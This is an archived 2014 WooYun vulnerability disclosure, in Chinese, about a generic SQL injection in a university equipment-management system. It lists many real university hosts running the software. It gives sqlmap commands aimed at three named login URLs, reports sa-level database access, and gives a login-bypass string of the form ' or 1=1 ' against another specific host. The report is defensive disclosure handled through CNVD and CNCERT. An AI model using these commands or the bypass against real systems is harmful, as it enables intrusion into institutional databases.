漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-056519
漏洞标题:某高校管理系统存在通用型SQL注入漏洞
相关厂商:cncert国家互联网应急中心
漏洞作者: Mr.leo
提交时间:2014-04-10 11:39
修复时间:2014-07-09 11:39
公开时间:2014-07-09 11:39
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-10: 细节已通知厂商并且等待厂商处理中
2014-04-15: 厂商已经确认,细节仅向厂商公开
2014-04-18: 细节向第三方安全合作伙伴开放
2014-06-09: 细节向核心白帽子及相关领域专家公开
2014-06-19: 细节向普通白帽子公开
2014-06-29: 细节向实习白帽子公开
2014-07-09: 细节向公众公开
简要描述:
某高校管理系统存在通用型SQL注入漏洞
详细说明:
北京普诺迪信息系统技术研发有限责任公司研发的仪器设备管理系统
百度关键字:欢迎进入大学仪器设备管理系统WEB站点系统认证
涉及很多大学院校列表
jfx.nju.edu.cn/sbweb/
zcc.nenu.edu.cn/sbweb/
202.199.224.155/sbweb/
sbcx.bjmu.edu.cn/sbweb/
210.45.215.133/sbweb/
202.197.61.13/sbweb/
http://sbapd.wh.sdu.edu.cn/
202.114.242.120/sbweb/
222.200.98.165:88/sbweb/
sysbc.ahu.edu.cn:8001/
http://202.197.224.86:8085/sbweb/
210.27.80.81/sbweb
211.82.90.69/sbweb/
sbgl.sdu.edu.cn/sbweb/
211.81.241.59:8086/sbweb/
211.65.116.58/sbweb/
202.197.120.77/wxweb
sqlmap3个实例证明下:
uid没有过滤,导致注射
Sqlmap -u "http://zcc.nenu.edu.cn/sbweb/Userlogin.asp?uid=1&pwd=2"
Sqlmap -u "http://sbcx.bjmu.edu.cn/sbweb/Userlogin.asp?uid=1&pwd=2"
Sqlmap -u "http://211.65.116.58/sbweb/Userlogin.asp?uid=1&pwd=2"
sa权限
基于时间的注入截图说明问题
1个实例证明,万能密码直接登录
http://202.192.18.120/sbweb/index.asp
选择任意用户名,密码' or 1=1 or ''='
漏洞证明:
已经证明
修复方案:
过滤参数
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-04-15 07:15
厂商回复:
CNVD确认并复现所述多个实例情况,确认通用性,已经转由CNCERT通报给教育网应急组织(赛尔网络公司),并抄报给CCERT和上海交通大学网络信息中心。
最新状态:
暂无